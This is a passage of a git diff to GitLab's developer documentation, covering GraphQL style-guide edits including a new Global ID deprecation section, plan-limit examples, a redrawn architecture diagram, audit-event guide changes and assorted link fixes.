[`agent_tracker/agent_tracker.proto`](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/agent_tracker/agent_tracker.proto) -- [`agent_tracker/rpc/rpc.proto`](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/agent_tracker/rpc/rpc.proto) -- [`reverse_tunnel/rpc/rpc.proto`](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/internal/module/reverse_tunnel/rpc/rpc.proto) +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/user_stories.md b/doc/development/agent/user_stories.md index ab135cad9d3..ce38064b31b 100644 --- a/doc/development/agent/user_stories.md +++ b/doc/development/agent/user_stories.md @@ -1,77 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/user_stories.md' +remove_date: '2022-06-24' --- -# Kubernetes Agent user stories **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/user_stories.md). -The [personas in action](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#user-personas) -for the Kubernetes Agent are: - -- [Sasha, the Software Developer](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#sasha-software-developer). -- [Allison, the Application Operator](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#allison-application-ops). -- [Priyanka, the Platform Engineer](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#priyanka-platform-engineer). - -[Devon, the DevOps engineer](https://about.gitlab.com/handbook/marketing/strategic-marketing/roles-personas/#devon-devops-engineer) -is intentionally excluded here, as DevOps is more of a role than a persona. - -There are various workflows to support, so some user stories might seem to contradict each other. They don't. - -## Software Developer user stories - -<!-- vale gitlab.FirstPerson = NO --> - -- As a Software Developer, I want to push my code, and move to the next development task, - to work on business applications. -- As a Software Developer, I want to set necessary dependencies and resource requirements - together with my application code, so my code runs fine after deployment. - -<!-- vale gitlab.FirstPerson = YES --> - -## Application Operator user stories - -<!-- vale gitlab.FirstPerson = NO --> - -- As an Application Operator, I want to standardize the deployments used by my teams, - so I can support all teams with minimal effort. -- As an Application Operator, I want to have a single place to define all the deployments, - so I can assure security fixes are applied everywhere. -- As an Application Operator, I want to offer a set of predefined templates to - Software Developers, so they can get started quickly and can deploy to production - without my intervention, and I am not a bottleneck. -- As an Application Operator, I want to know exactly what changes are being deployed, - so I can fulfill my SLAs. -- As an Application Operator, I want deep insights into what versions of my applications - are running and want to be able to debug them, so I can fix operational issues. -- As an Application Operator, I want application code to be automatically deployed - to staging environments when new versions are available. -- As an Application Operator, I want to follow my preferred deployment strategy, - so I can move code into production in a reliable way. -- As an Application Operator, I want review all code before it's deployed into production, - so I can fulfill my SLAs. -- As an Application Operator, I want to be notified before deployment when new code needs my attention, - so I can review it swiftly. - -<!-- vale gitlab.FirstPerson = YES --> - -## Platform Engineer user stories - -<!-- vale gitlab.FirstPerson = NO --> - -- As a Platform Engineer, I want to restrict customizations to preselected values - for Operators, so I can fulfill my SLAs. -- As a Platform Engineer, I want to allow some level of customization to Operators, - so I don't become a bottleneck. -- As a Platform Engineer, I want to define all deployments in a single place, so - I can assure security fixes are applied everywhere. -- As a Platform Engineer, I want to define the infrastructure by code, so my - infrastructure management is testable, reproducible, traceable, and scalable. -- As a Platform Engineer, I want to define various policies that applications must - follow, so that I can fulfill my SLAs. -- As a Platform Engineer, I want approved tooling for log management and persistent storage, - so I can scale, secure, and manage them as needed. -- As a Platform Engineer, I want to be alerted when my infrastructure differs from - its definition, so I can make sure that everything is configured as expected. - -<!-- vale gitlab.FirstPerson = YES --> +<!-- This redirect file can be deleted after <2022-06-24>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/api_graphql_styleguide.md b/doc/development/api_graphql_styleguide.md index 4d521d11a69..c12b66a94a7 100644 --- a/doc/development/api_graphql_styleguide.md +++ b/doc/development/api_graphql_styleguide.md @@ -22,7 +22,7 @@ which is exposed as an API endpoint at `/api/graphql`. ## Deep Dive In March 2019, Nick Thomas hosted a Deep Dive (GitLab team members only: `https://gitlab.com/gitlab-org/create-stage/issues/1`) -on the GitLab [GraphQL API](../api/graphql/index.md) to share his domain specific knowledge +on the GitLab [GraphQL API](../api/graphql/index.md) to share domain-specific knowledge with anyone who may work in this part of the codebase in the future. You can find the <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> [recording on YouTube](https://www.youtube.com/watch?v=-9L_1MWrjkg), and the slides on @@ -68,9 +68,7 @@ Complexity is explained [on our client-facing API page](../api/graphql/index.md# Fields default to adding `1` to a query's complexity score, but developers can [specify a custom complexity](#field-complexity) when defining a field. -To estimate the complexity of a query, you can run the -[`gitlab:graphql:analyze`](rake_tasks.md#analyze-graphql-queries) -Rake task. +The complexity score of a query [can itself be queried for](../api/graphql/getting_started.md#query-complexity). ### Request timeout @@ -83,7 +81,7 @@ developers must familiarize themselves with our [Deprecation and Removal process Breaking changes are: -- Removing or renaming a field, argument, enum value or mutation. +- Removing or renaming a field, argument, enum value, or mutation. - Changing the type of a field, argument or enum value. - Raising the [complexity](#max-complexity) of a field or complexity multipliers in a resolver. - Changing a field from being _not_ nullable (`null: false`) to nullable (`null: true`), as @@ -96,7 +94,7 @@ discussed in [Nullable fields](#nullable-fields). Fields that use the [`feature_flag` property](#feature_flag-property) and the flag is disabled by default are exempt from the deprecation process, and can be removed at any time without notice. -See the [deprecating fields and enum values](#deprecating-fields-arguments-and-enum-values) section for how to deprecate items. +See the [deprecating fields, arguments, and enum values](#deprecating-fields-arguments-and-enum-values) section for how to deprecate items. ## Global IDs @@ -110,6 +108,7 @@ See also: - [Exposing Global IDs](#exposing-global-ids). - [Mutation arguments](#object-identifier-arguments). +- [Deprecating Global IDs](#deprecate-global-ids). We have a custom scalar type (`Types::GlobalIDType`) which should be used as the type of input and output arguments when the value is a `GlobalID`. The benefits @@ -117,12 +116,12 @@ of using this type instead of `ID` are: - it validates that the value is a `GlobalID` - it parses it into a `GlobalID` before passing it to user code -- it can be parameterized on the type of the object (e.g. +- it can be parameterized on the type of the object (for example, `GlobalIDType[Project]`) which offers even better validation and security. Consider using this type for all new arguments and result types. Remember that it is perfectly possible to parameterize this type with a concern or a -supertype, if you want to accept a wider range of objects (e.g. +supertype, if you want to accept a wider range of objects (such as `GlobalIDType[Issuable]` vs `GlobalIDType[Issue]`). ## Types @@ -206,7 +205,7 @@ Further reading: - [GraphQL Best Practices Guide](https://graphql.org/learn/best-practices/#nullability). - GraphQL documentation on [Object types and fields](https://graphql.org/learn/schema/#object-types-and-fields). - [GraphQL Best Practices Guide](https://graphql.org/learn/best-practices/#nullability) -- [Using nullability in GraphQL](https://www.apollographql.com/blog/using-nullability-in-graphql-2254f84c4ed7) +- [Using nullability in GraphQL](https://www.apollographql.com/blog/graphql/basics/using-nullability-in-graphql/) ### Exposing Global IDs @@ -341,7 +340,7 @@ For example, instead of `latest_pipeline`, use `pipelines(last: 1)`. By default, the API returns at most a maximum number of records defined in [`app/graphql/gitlab_schema.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/graphql/gitlab_schema.rb) -per page within a connection and this will also be the default number of records +per page in a connection and this is also the default number of records returned per page if no limiting arguments (`first:` or `last:`) are provided by a client. The `max_page_size` argument can be used to specify a different page size limit @@ -369,7 +368,7 @@ Complexity is described in [our client documentation](../api/graphql/index.md#ma Complexity limits are defined in [`app/graphql/gitlab_schema.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/graphql/gitlab_schema.rb). -By default, fields will add `1` to a query's complexity score. This can be overridden by +By default, fields add `1` to a query's complexity score. This can be overridden by [providing a custom `complexity`](https://graphql-ruby.org/queries/complexity_and_depth.html) value for a field. Developers should specify higher complexity for fields that cause more _work_ to be performed @@ -390,7 +389,7 @@ field :blob, type: Types::Snippets::BlobType, calls_gitaly: true ``` -This will increment the [`complexity` score](#field-complexity) of the field by `1`. +This increments the [`complexity` score](#field-complexity) of the field by `1`. If a resolver calls Gitaly, it can be annotated with `BaseResolver.calls_gitaly!`. This passes `calls_gitaly: true` to any @@ -480,7 +479,7 @@ You can refer to these guidelines to decide which approach to use: The `feature_flag` property allows you to toggle the field's [visibility](https://graphql-ruby.org/authorization/visibility.html) -within the GraphQL schema. This removes the field from the schema +in the GraphQL schema. This removes the field from the schema when the flag is disabled. A description is [appended](https://gitlab.com/gitlab-org/gitlab/-/blob/497b556/app/graphql/types/base_field.rb#L44-53) @@ -595,6 +594,103 @@ end If the field, argument, or enum value being deprecated is not being replaced, a descriptive deprecation `reason` should be given. +### Deprecate Global IDs + +We use the [`rails/globalid`](https://github.com/rails/globalid) gem to generate and parse +Global IDs, so as such they are coupled to model names. When we rename a +model, its Global ID changes. + +If the Global ID is used as an _argument_ type anywhere in the schema, then the Global ID +change would normally constitute a breaking change. + +To continue to support clients using the old Global ID argument, we add a deprecation +to `Gitlab::GlobalId::Deprecations`. + +NOTE: +If the Global ID is _only_ [exposed as a field](#exposing-global-ids) then we do not need to +deprecate it. We consider the change to the way a Global ID is expressed in a field to be +backwards-compatible. We expect that clients don't parse these values: they are meant to +be treated as opaque tokens, and any structure in them is incidental and not to be relied on. + +**Example scenario:** + +This example scenario is based on this [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/62645). + +A model named `PrometheusService` is to be renamed `Integrations::Prometheus`. The old model +name is used to create a Global ID type that is used as an argument for a mutation: + +```ruby +# Mutations::UpdatePrometheus: + +argument :id, Types::GlobalIDType[::PrometheusService], + required: true, + description: "The ID of the integration to mutate." +``` + +Clients call the mutation by passing a Global ID string that looks like +`"gid://gitlab/PrometheusService/1"`, named as `PrometheusServiceID`, as the `input.id` argument: + +```graphql +mutation updatePrometheus($id: PrometheusServiceID!, $active: Boolean!) { + prometheusIntegrationUpdate(input: { id: $id, active: $active }) { + errors + integration { + active + } + } +} +``` + +We rename the model to `Integrations::Prometheus`, and then update the codebase with the new name. +When we come to update the mutation, we pass the renamed model to `Types::GlobalIDType[]`: + +```ruby +# Mutations::UpdatePrometheus: + +argument :id, Types::GlobalIDType[::Integrations::Prometheus], + required: true, + description: "The ID of the integration to mutate." +``` + +This would cause a breaking change to the mutation, as the API now rejects clients who +pass an `id` argument as `"gid://gitlab/PrometheusService/1"`, or that specify the argument +type as `PrometheusServiceID` in the query signature. + +To allow clients to continue to interact with the mutation unchanged, edit the `DEPRECATIONS` constant in +`Gitlab::GlobalId::Deprecations` and add a new `Deprecation` to the array: + +```ruby +DEPRECATIONS = [ + Deprecation.new(old_model_name: 'PrometheusService', new_model_name: 'Integrations::Prometheus', milestone: '14.0') +].freeze +``` + +Then follow our regular [deprecation process](../api/graphql/index.md#deprecation-and-removal-process). To later remove +support for the former argument style, remove the `Deprecation`: + +```ruby +DEPRECATIONS = [].freeze +``` + +During the deprecation period the API will accept either of these formats for the argument value: + +- `"gid://gitlab/PrometheusService/1"` +- `"gid://gitlab/Integrations::Prometheus/1"` + +The API will also accept these types in the query signature for the argument: + +- `PrometheusServiceID` +- `IntegrationsPrometheusID` + +NOTE: +Although queries that use the old type (`PrometheusServiceID` in this example) will be +considered valid and executable by the API, validator tools will consider them to be invalid. +This is because we are deprecating using a bespoke method outside of the +[`@deprecated` directive](https://spec.graphql.org/June2018/#sec--deprecated), so validators are not +aware of the support. + +The documentation will mention that the old Global ID style is now deprecated. + See also [Aliasing and deprecating mutations](#aliasing-and-deprecating-mutations). ## Enums @@ -784,7 +880,7 @@ field :genus, see: { 'Wikipedia page on genera' => 'https://wikipedia.org/wiki/Genus' } ``` -This will render in our documentation as: +This renders in our documentation as: ```markdown A taxonomic genus. See: [Wikipedia page on genera](https://wikipedia.org/wiki/Genus) @@ -859,11 +955,11 @@ overhead. If you are writing: ### Error handling -Resolvers may raise errors, which will be converted to top-level errors as +Resolvers may raise errors, which are converted to top-level errors as appropriate. All anticipated errors should be caught and transformed to an appropriate GraphQL error (see [`Gitlab::Graphql::Errors`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/graphql/errors.rb)). -Any uncaught errors will be suppressed and the client will receive the message +Any uncaught errors are suppressed and the client receives the message `Internal service error`. The one special case is permission errors. In the REST API we return @@ -874,7 +970,7 @@ Query resolvers **should not raise errors for unauthorized resources**. The rationale for this is that clients must not be able to distinguish between the absence of a record and the presence of one they do not have access to. To -do so is a security vulnerability, since it leaks information we want to keep +do so is a security vulnerability, because it leaks information we want to keep hidden. In most cases you don't need to worry about this - this is handled correctly by @@ -1037,7 +1133,7 @@ class MyThingResolver < BaseResolver end ``` -By default, fields defined in `#preloads` will be preloaded if that field +By default, fields defined in `#preloads` are preloaded if that field is selected in the query. Occasionally, finer control may be needed to avoid preloading too much or incorrect content. @@ -1121,7 +1217,7 @@ available in the `Resolver` class as `parent`. To find the parent object in your `Presenter` class: -1. Add the parent object to the GraphQL `context` from within your resolver's `resolve` method: +1. Add the parent object to the GraphQL `context` from your resolver's `resolve` method: ```ruby def resolve(**args) @@ -1316,6 +1412,8 @@ Where an object has an `iid`, prefer to use the `full_path` or `group_path` of its parent in combination with its `iid` as arguments to identify an object rather than its `id`. +See also [Deprecate Global IDs](#deprecate-global-ids). + ### Fields In the most common situations, a mutation would return 2 fields: @@ -1327,7 +1425,7 @@ In the most common situations, a mutation would return 2 fields: By inheriting any new mutations from `Mutations::BaseMutation` the `errors` field is automatically added. A `clientMutationId` field is also added, this can be used by the client to identify the result of a -single mutation when multiple are performed within a single request. +single mutation when multiple are performed in a single request. ### The `resolve` method @@ -1447,7 +1545,7 @@ There are three states a mutation response can be in: #### Success In the happy path, errors *may* be returned, along with the anticipated payload, but -if everything was successful, then `errors` should be an empty array, since +if everything was successful, then `errors` should be an empty array, because there are no problems we need to inform the user of. ```javascript @@ -1524,7 +1622,7 @@ of errors should be treated as internal, and not shown to the user in specific detail. We need to inform the user when the mutation fails, but we do not need to -tell them why, since they cannot have caused it, and nothing they can do +tell them why, because they cannot have caused it, and nothing they can do fixes it, although we may offer to retry the mutation. #### Categorizing errors @@ -1544,7 +1642,7 @@ See also the [frontend GraphQL guide](../development/fe_guide/graphql.md#handlin ### Aliasing and deprecating mutations The `#mount_aliased_mutation` helper allows us to alias a mutation as -another name within `MutationType`. +another name in `MutationType`. For example, to alias a mutation called `FooMutation` as `BarMutation`: @@ -1565,7 +1663,7 @@ mount_aliased_mutation 'UpdateFoo', ``` Deprecated mutations should be added to `Types::DeprecatedMutations` and -tested for within the unit test of `Types::MutationType`. The merge request +tested for in the unit test of `Types::MutationType`. The merge request [!34798](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/34798) can be referred to as an example of this, including the method of testing deprecated aliased mutations. @@ -1591,7 +1689,7 @@ We cannot test subscriptions using GraphiQL, because they require an Action Cabl All fields under `Types::SubscriptionType` are subscriptions that clients can subscribe to. These fields require a subscription class, which is a descendant of `Subscriptions::BaseSubscription` and is stored under `app/graphql/subscriptions`. -The arguments required to subscribe and the fields that are returned are defined within the subscription class. Multiple fields can share +The arguments required to subscribe and the fields that are returned are defined in the subscription class. Multiple fields can share the same subscription class if they have the same arguments and return the same fields. This class runs during the initial subscription request and subsequent updates. You can read more about this in the @@ -1623,8 +1721,8 @@ as normal. Sometimes a mutation or resolver may accept a number of optional arguments, but we still want to validate that at least one of the optional arguments is provided. In this situation, consider using the `#ready?` -method within your mutation or resolver to provide the validation. The -`#ready?` method is called before any work is done within the +method in your mutation or resolver to provide the validation. The +`#ready?` method is called before any work is done in the `#resolve` method. Example: @@ -1698,7 +1796,7 @@ For speed, you should test most logic in unit tests instead of integration tests However, integration tests that check if data is returned verify the following additional items: -- The mutation is actually queryable within the schema (was mounted in `MutationType`). +- The mutation is actually queryable in the schema (was mounted in `MutationType`). - The data returned by a resolver or mutation correctly matches the [return types](https://graphql-ruby.org/fields/introduction.html#field-return-type) of the fields and resolves without errors. @@ -1846,7 +1944,7 @@ to protect server resources from overly ambitious or malicious queries. These values can be set as defaults and overridden in specific queries as needed. The complexity values can be set per object as well, and the final query complexity is evaluated based on how many objects are being returned. This is useful -for objects that are expensive (e.g. requiring Gitaly calls). +for objects that are expensive (such as requiring Gitaly calls). For example, a conditional complexity method in a resolver: diff --git a/doc/development/application_limits.md b/doc/development/application_limits.md index b532a7ff98b..b606cda1124 100644 --- a/doc/development/application_limits.md +++ b/doc/development/application_limits.md @@ -48,7 +48,11 @@ It's recommended to create two separate migration script files. create_or_update_plan_limit('project_hooks', 'free', 10) create_or_update_plan_limit('project_hooks', 'bronze', 20) create_or_update_plan_limit('project_hooks', 'silver', 30) + create_or_update_plan_limit('project_hooks', 'premium', 30) + create_or_update_plan_limit('project_hooks', 'premium_trial', 30) create_or_update_plan_limit('project_hooks', 'gold', 100) + create_or_update_plan_limit('project_hooks', 'ultimate', 100) + create_or_update_plan_limit('project_hooks', 'ultimate_trial', 100) end def down @@ -56,7 +60,11 @@ It's recommended to create two separate migration script files. create_or_update_plan_limit('project_hooks', 'free', 0) create_or_update_plan_limit('project_hooks', 'bronze', 0) create_or_update_plan_limit('project_hooks', 'silver', 0) + create_or_update_plan_limit('project_hooks', 'premium', 0) + create_or_update_plan_limit('project_hooks', 'premium_trial', 0) create_or_update_plan_limit('project_hooks', 'gold', 0) + create_or_update_plan_limit('project_hooks', 'ultimate', 0) + create_or_update_plan_limit('project_hooks', 'ultimate_trial', 0) end end ``` @@ -145,6 +153,10 @@ GitLab.com: - `free`: Namespaces and projects with a Free subscription. - `bronze`: Namespaces and projects with a Bronze subscription. This tier is no longer available for purchase. - `silver`: Namespaces and projects with a Premium subscription. +- `premium`: Namespaces and projects with a Premium subscription. +- `premium_trial`: Namespaces and projects with a Premium Trial subscription. - `gold`: Namespaces and projects with an Ultimate subscription. +- `ultimate`: Namespaces and projects with an Ultimate subscription. +- `ultimate_trial`: Namespaces and projects with an Ultimate Trial subscription. The `test` environment doesn't have any plans. diff --git a/doc/development/architecture.md b/doc/development/architecture.md index 9801b24fdd0..f39171b1e69 100644 --- a/doc/development/architecture.md +++ b/doc/development/architecture.md @@ -35,7 +35,7 @@ Kubernetes platform. The largest known GitLab instance is on GitLab.com, which i A typical installation uses NGINX or Apache as a web server to proxy through [GitLab Workhorse](https://gitlab.com/gitlab-org/gitlab-workhorse) and into the [Puma](https://puma.io) -application server. GitLab serves web pages and the [GitLab API](../api/README.md) using the Puma +application server. GitLab serves web pages and the [GitLab API](../api/index.md) using the Puma application server. It uses Sidekiq as a job queue which, in turn, uses Redis as a non-persistent database backend for job information, metadata, and incoming jobs. @@ -111,72 +111,187 @@ https://docs.google.com/drawings/d/1fBzAyklyveF-i-2q-OHUIqDkYfjjxC4mq5shwKSZHLs/ ### Component diagram ```mermaid -graph TB - -HTTP[HTTP/HTTPS] -- TCP 80, 443 --> NGINX[NGINX] -SSH -- TCP 22 --> GitLabShell[GitLab Shell] -SMTP[SMTP Gateway] -Geo[GitLab Geo Node] -- TCP 22, 80, 443 --> NGINX - -GitLabShell --TCP 8080 -->Puma["Puma (GitLab Rails)"] -GitLabShell --> Praefect -Puma --> PgBouncer[PgBouncer] -Puma --> Redis -Puma --> Praefect -Sidekiq --> Redis -Sidekiq --> PgBouncer -Sidekiq --> Praefect -GitLabWorkhorse[GitLab Workhorse] --> Puma -GitLabWorkhorse --> Redis -GitLabWorkhorse --> Praefect -Praefect --> Gitaly -NGINX --> GitLabWorkhorse -NGINX -- TCP 8090 --> GitLabPages[GitLab Pages] -NGINX --> Grafana[Grafana] -NGINX -- TCP 8150 --> GitLabKas[GitLab Kubernetes Agent Server] -GitLabKas --> Praefect -Grafana -- TCP 9090 --> Prometheus[Prometheus] -Prometheus -- TCP 80, 443 --> Puma -RedisExporter[Redis Exporter] --> Redis -Prometheus -- TCP 9121 --> RedisExporter -PostgreSQLExporter[PostgreSQL Exporter] --> PostgreSQL -PgBouncerExporter[PgBouncer Exporter] --> PgBouncer -Prometheus -- TCP 9187 --> PostgreSQLExporter -Prometheus -- TCP 9100 --> NodeExporter[Node Exporter] -Prometheus -- TCP 9168 --> GitLabExporter[GitLab Exporter] -Prometheus -- TCP 9127 --> PgBouncerExporter -GitLabExporter --> PostgreSQL -GitLabExporter --> GitLabShell -GitLabExporter --> Sidekiq -PgBouncer --> Consul -PostgreSQL --> Consul -PgBouncer --> PostgreSQL -NGINX --> Registry -Puma --> Registry -NGINX --> Mattermost -Mattermost --- Puma -Prometheus --> Alertmanager -Migrations --> PostgreSQL -Runner -- TCP 443 --> NGINX -Puma -- TCP 9200 --> Elasticsearch -Sidekiq -- TCP 9200 --> Elasticsearch -Sidekiq -- TCP 80, 443 --> Sentry -Puma -- TCP 80, 443 --> Sentry -Sidekiq -- UDP 6831 --> Jaeger -Puma -- UDP 6831 --> Jaeger -Gitaly -- UDP 6831 --> Jaeger -GitLabShell -- UDP 6831 --> Jaeger -GitLabWorkhorse -- UDP 6831 --> Jaeger -Alertmanager -- TCP 25 --> SMTP -Sidekiq -- TCP 25 --> SMTP -Puma -- TCP 25 --> SMTP -Puma -- TCP 369 --> LDAP -Sidekiq -- TCP 369 --> LDAP -Puma -- TCP 443 --> ObjectStorage["Object Storage"] -Sidekiq -- TCP 443 --> ObjectStorage -GitLabWorkhorse -- TCP 443 --> ObjectStorage -Registry -- TCP 443 --> ObjectStorage -Geo -- TCP 5432 --> PostgreSQL +%%{init: {"flowchart": { "useMaxWidth": false } }}%% +graph LR + %% Anchor items in the appropriate subgraph. + %% Link them where the destination* is. + + subgraph Clients + Browser((Browser)) + Git((Git)) + end + + %% External Components / Applications + Geo{{GitLab Geo}} -- TCP 80, 443 --> HTTP + Geo -- TCP 22 --> SSH + Geo -- TCP 5432 --> PostgreSQL + Runner{{GitLab Runner}} -- TCP 443 --> HTTP + K8sAgent{{GitLab Kubernetes Agent}} -- TCP 443 --> HTTP + + %% GitLab Application Suite + subgraph GitLab + subgraph Ingress + HTTP[[HTTP/HTTPS]] + SSH[[SSH]] + NGINX[NGINX] + GitLabShell[GitLab Shell] + + %% inbound/internal + Browser -- TCP 80,443 --> HTTP + Git -- TCP 80,443 --> HTTP + Git -- TCP 22 --> SSH + HTTP -- TCP 80, 443 --> NGINX + SSH -- TCP 22 --> GitLabShell + end + + subgraph GitLab Services + %% inbound from NGINX + NGINX --> GitLabWorkhorse + NGINX -- TCP 8090 --> GitLabPages + NGINX -- TCP 8150 --> GitLabKas + NGINX --> Registry + %% inbound from GitLabShell + GitLabShell --TCP 8080 -->Puma + + %% services + Puma["Puma (GitLab Rails)"] + Puma <--> Registry + GitLabWorkhorse[GitLab Workhorse] <--> Puma + GitLabKas[GitLab Kubernetes Agent Server] --> GitLabWorkhorse + GitLabPages[GitLab Pages] --> GitLabWorkhorse + Mailroom + Sidekiq + end + + subgraph Integrated Services + %% Mattermost + Mattermost + Mattermost ---> GitLabWorkhorse + NGINX --> Mattermost + + %% Grafana + Grafana + NGINX --> Grafana + end + + subgraph Metadata + %% PostgreSQL + PostgreSQL + PostgreSQL --> Consul + + %% Consul and inbound + Consul + Puma ---> Consul + Sidekiq ---> Consul + Migrations --> PostgreSQL + + %% PgBouncer and inbound + PgBouncer + PgBouncer --> Consul + PgBouncer --> PostgreSQL + Sidekiq --> PgBouncer + Puma --> PgBouncer + end + + subgraph State + %% Redis and inbound + Redis + Puma --> Redis + Sidekiq --> Redis + GitLabWorkhorse --> Redis + Mailroom --> Redis + GitLabKas --> Redis + + %% Sentinel and inbound + Sentinel <--> Redis + Puma --> Sentinel + Sidekiq --> Sentinel + GitLabWorkhorse --> Sentinel + Mailroom --> Sentinel + GitLabKas --> Sentinel + end + + subgraph Git Repositories + %% Gitaly / Praefect + Praefect --> Gitaly + GitLabKas --> Praefect + GitLabShell --> Praefect + GitLabWorkhorse --> Praefect + Puma --> Praefect + Sidekiq --> Praefect + Praefect <--> PraefectPGSQL[PostgreSQL] + %% Gitaly makes API calls + %% Ordered here to ensure placement. + Gitaly --> GitLabWorkhorse + end + + subgraph Storage + %% ObjectStorage and inbound traffic + ObjectStorage["Object Storage"] + Puma -- TCP 443 --> ObjectStorage + Sidekiq -- TCP 443 --> ObjectStorage + GitLabWorkhorse -- TCP 443 --> ObjectStorage + Registry -- TCP 443 --> ObjectStorage + GitLabPages -- TCP 443 --> ObjectStorage + end + + subgraph Monitoring + %% Prometheus + Grafana -- TCP 9090 --> Prometheus[Prometheus] + Prometheus -- TCP 80, 443 --> Puma + RedisExporter[Redis Exporter] --> Redis + Prometheus -- TCP 9121 --> RedisExporter + PostgreSQLExporter[PostgreSQL Exporter] --> PostgreSQL + PgBouncerExporter[PgBouncer Exporter] --> PgBouncer + Prometheus -- TCP 9187 --> PostgreSQLExporter + Prometheus -- TCP 9100 --> NodeExporter[Node Exporter] + Prometheus -- TCP 9168 --> GitLabExporter[GitLab Exporter] + Prometheus -- TCP 9127 --> PgBouncerExporter + Prometheus --> Alertmanager + GitLabExporter --> PostgreSQL + GitLabExporter --> GitLabShell + GitLabExporter --> Sidekiq + + %% Alertmanager + Alertmanager -- TCP 25 --> SMTP + end + %% end subgraph GitLab + end + + subgraph External + subgraph External Services + SMTP[SMTP Gateway] + LDAP + + %% Outbound SMTP + Sidekiq -- TCP 25 --> SMTP + Puma -- TCP 25 --> SMTP + Mailroom -- TCP 25 --> SMTP + + %% Outbound LDAP + Puma -- TCP 369 --> LDAP + Sidekiq -- TCP 369 --> LDAP + + %% Elasticsearch + Elasticsearch + Puma -- TCP 9200 --> Elasticsearch + Sidekiq -- TCP 9200 --> Elasticsearch + end + subgraph External Monitoring + %% Sentry + Sidekiq -- TCP 80, 443 --> Sentry + Puma -- TCP 80, 443 --> Sentry + + %% Jaeger + Jaeger + Sidekiq -- UDP 6831 --> Jaeger + Puma -- UDP 6831 --> Jaeger + Gitaly -- UDP 6831 --> Jaeger + GitLabShell -- UDP 6831 --> Jaeger + GitLabWorkhorse -- UDP 6831 --> Jaeger + end + %% end subgraph External + end click Alertmanager "./architecture.html#alertmanager" click Praefect "./architecture.html#praefect" diff --git a/doc/development/audit_event_guide/index.md b/doc/development/audit_event_guide/index.md index 0bff297f2a0..f809293df59 100644 --- a/doc/development/audit_event_guide/index.md +++ b/doc/development/audit_event_guide/index.md @@ -20,12 +20,11 @@ To instrument an audit event, the following attributes should be provided: | Attribute | Type | Required? | Description | |:-------------|:---------------------|:----------|:----------------------------------------------------| -| `name` | string | false | Action name to be audited. Used for error tracking | +| `name` | String | false | Action name to be audited. Used for error tracking | | `author` | User | true | User who authors the change | | `scope` | User, Project, Group | true | Scope which the audit event belongs to | | `target` | Object | true | Target object being audited | -| `ip_address` | IPAddr | false | Request IP address | -| `message` | string | true | Message describing the action | +| `message` | String | true | Message describing the action | ## How to instrument new Audit Events @@ -56,15 +55,14 @@ to both approvers and approval groups. In the initiating service ```ruby # in the initiating service audit_context = { - name: 'merge_approval_rule_updated', + name: 'update_merge_approval_rule', author: current_user, scope: project_alpha, target: merge_approval_rule, - ip_address: request.remote_ip, message: 'Attempted to update an approval rule' } -Gitlab::Audit::Auditor.audit(audit_context) do +::Gitlab::Audit::Auditor.audit(audit_context) do service.execute end ``` @@ -95,15 +93,14 @@ This method allows recording single audit event and involves fewer moving parts. ```ruby if merge_approval_rule.save audit_context = { - name: 'merge_approval_rule_created', + name: 'create_merge_approval_rule', author: current_user, scope: project_alpha, target: merge_approval_rule, - ip_address: request.remote_ip, message: 'Created a new approval rule' } - Gitlab::Audit::Auditor.audit(audit_context) + ::Gitlab::Audit::Auditor.audit(audit_context) end ``` @@ -114,7 +111,7 @@ The two ways we can instrument audit events have different flows. ### Using block to record multiple events We wrap the operation block in a `Gitlab::Audit::Auditor` which captures the -initial audit context (that is, `author`, `scope`, `target`, `ip_address`) object that are +initial audit context (that is, `author`, `scope`, `target`) object that are available at the time the operation is initiated. Extra instrumentation is required in the interacted classes in the chain with diff --git a/doc/development/auto_devops.md b/doc/development/auto_devops.md index 054a3439ef1..2989e10a124 100644 --- a/doc/development/auto_devops.md +++ b/doc/development/auto_devops.md @@ -18,7 +18,7 @@ is also available on YouTube. Auto DevOps builds on top of GitLab CI/CD to create an automatic pipeline based on your project contents. When Auto DevOps is enabled for a project, the user does not need to explicitly include any pipeline configuration -through a [`.gitlab-ci.yml` file](../ci/yaml/README.md). +through a [`.gitlab-ci.yml` file](../ci/yaml/index.md). In the absence of a `.gitlab-ci.yml` file, the [Auto DevOps CI template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Auto-DevOps.gitlab-ci.yml) diff --git a/doc/development/avoiding_downtime_in_migrations.md b/doc/development/avoiding_downtime_in_migrations.md index 6b6c47cfece..646b07f7266 100644 --- a/doc/development/avoiding_downtime_in_migrations.md +++ b/doc/development/avoiding_downtime_in_migrations.md @@ -95,8 +95,6 @@ renaming. For example class RenameUsersUpdatedAtToUpdatedAtTimestamp < ActiveRecord::Migration[4.2] include Gitlab::Database::MigrationHelpers - DOWNTIME = false - disable_ddl_transaction! def up @@ -291,8 +289,6 @@ any remaining rows. For example: class MigrateRemainingIssuesClosedAt < ActiveRecord::Migration[4.2] include Gitlab::Database::MigrationHelpers - DOWNTIME = false - disable_ddl_transaction! class Issue < ActiveRecord::Base diff --git a/doc/development/background_migrations.md b/doc/development/background_migrations.md index 0b81d40f585..534621caf8f 100644 --- a/doc/development/background_migrations.md +++ 